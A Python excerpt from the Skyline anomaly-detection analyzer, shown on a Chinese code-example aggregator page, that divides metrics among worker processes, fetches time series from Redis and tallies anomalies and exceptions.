        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    metric = [datapoint, metric_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
        	        self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
#.........这里部分代码省略.........
开发者ID:HeTyHuka,项目名称:skyline,代码行数:103,代码来源:analyzer.py


注:本文中的multiprocessing.Manager.append方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。